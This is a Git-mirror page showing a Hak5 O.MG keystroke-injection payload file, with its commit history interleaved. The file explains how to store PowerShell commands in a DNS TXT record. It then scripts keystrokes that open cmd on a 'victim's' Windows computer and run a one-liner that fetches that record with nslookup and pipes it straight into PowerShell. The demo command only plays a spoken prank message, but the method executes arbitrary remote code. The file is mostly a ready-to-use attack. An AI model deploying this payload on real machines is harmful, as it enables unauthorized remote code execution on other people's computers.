hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
omg-payloads/payloads/library/execution/DNS-TXT-Run/payload.txt

49 lines
2.9 KiB
Plaintext
Raw Permalink Normal View History

Create payload.txt
2021-10-18 16:37:23 +00:00
#-----------------------------------------------------------------------------------------------------------
# Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in
# Description: An example of how you could use DNS TXT records to get the powershell code you want to run.
# This POC will get some commands that will play a message on a victims computer using Windows
# build speach engine. It also turns up the volume first, then speak out loud the text you want.
# Author: Keld Norman / Twitter: @keld_norman
# Props: Google, RTFM, and trial and errors
# Version: 1.0
# Category: Execution
# Target: Windows10+ Powershell
# Attackmodes: HID
#-----------------------------------------------------------------------------------------------------------
# Quick Guide
#-----------------------------------------------------------------------------------------------------------
# First You must setup a DNS TXT record.
#
# I use Cloudflare where is is just to go to the DNS tab and select "Add record", then select the type: TXT
#
# Example from Cloudflare where i call my new txt record for "omg":
#
# Type Name Content TTL Proxy
# TXT omg Insert-the-line-below-here[Max 2048 chars] Auto NO
#
# As an example/a test you could insert this one liner (the below line) in the "Content field" for the TXT record
#
$keyPresses=[Math]::Ceiling(100/2);$obj=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $keyPresses;$i++){$obj.SendKeys([char] 175)};$sp=New-Object -ComObject SAPI.SpVoice;$sp.Speak("Today is $((Get-Date).DayOfWeek) and you just got OMG'd")
#
# NB: be aware that TXT records can be at a maximum of 2048 chars and that they often are split in to
# several 255 chars lines that will break your command.
#-----------------------------------------------------------------------------------------------------------
# Then just execute this in a windows terminal ( WIN+R then CMD and enter ) to use the build in Windows nslookup command
# to retrieve the commands you want to run from your TXT record:
#-----------------------------------------------------------------------------------------------------------
#
for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
#
#-----------------------------------------------------------------------------------------------------------
# In OMG code that would be:
#-----------------------------------------------------------------------------------------------------------
DUCKY_LANG US
Update payload.txt
2021-10-18 18:00:14 +00:00
GUI r
DELAY 1000
STRING CMD
Create payload.txt
2021-10-18 16:37:23 +00:00
ENTER
Update payload.txt
2021-10-18 18:00:14 +00:00
DELAY 500
STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
Update payload.txt
2021-10-18 17:24:37 +00:00
ENTER
Create payload.txt
2021-10-18 16:37:23 +00:00
#-----------------------------------------------------------------------------------------------------------